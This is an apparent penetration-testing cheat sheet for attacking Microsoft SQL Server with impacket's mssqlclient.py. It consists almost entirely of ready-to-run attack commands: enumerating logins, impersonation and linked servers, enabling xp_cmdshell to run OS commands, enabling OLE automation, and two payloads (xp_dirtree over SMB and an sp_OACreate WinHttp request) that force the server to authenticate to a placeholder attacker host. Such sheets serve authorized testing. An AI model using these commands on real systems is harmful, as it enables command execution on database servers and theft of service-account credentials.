# mssqlclient.py
Great for enumerating/attacking SQL server.  [This article](https://mayfly277.github.io/posts/GOADv2-pwning-part7/) was very helpful in putting together this cheat sheet.

## Basic command to connect to a SQL server
```
mssqlclient.py user@host -port 123
```

## Connect to SQL server with a domain account and non-standard port
```
mssqlclient.py domain.com/user@sql1.domain.com -p 123 -windows-auth
```

## Enum logins
```
enum_logins
```

## Enumerate impersonation values
```
enum_impersonate
```

## Enumerate linked SQL servers
```
enum_links
```

## Enable XP_CMDSHELL
```
enable_xp_cmdshell
```

### Run command using XP_CMDSHELL
```
xp_cmdshell whoami
```

## Turn on OLE automation
This comes in handy if, for example, you can't [coerce Web auth from your attacking system](/pentesting/internal/mssqlclient):
 
```
sp_configure 'Ole Automation Procedures', 1 
reconfigure
```

## Coerce an SMB connection to an attacker system using XP_DIRTREEE
```
EXEC xp_dirtree '\\YOUR.ATTACKING.IP.ADDRESS\doesntmatter'; 
```

## Coerce an HTTP connection to your attacker system:
```
DECLARE @o INT; EXEC sp_OACreate 'WinHttp.WinHttpRequest.5.1', @o OUT; EXEC sp_OAMethod @o, 'open', NULL, 'GET', 'http://DNS-NAME-OF-YOUR-ATTACK-BOX', 'false'; EXEC sp_OAMethod @o, 'SetAutoLogonPolicy', NULL, 0; EXEC sp_OAMethod @o, 'send'; EXEC sp_OADestroy @o;
```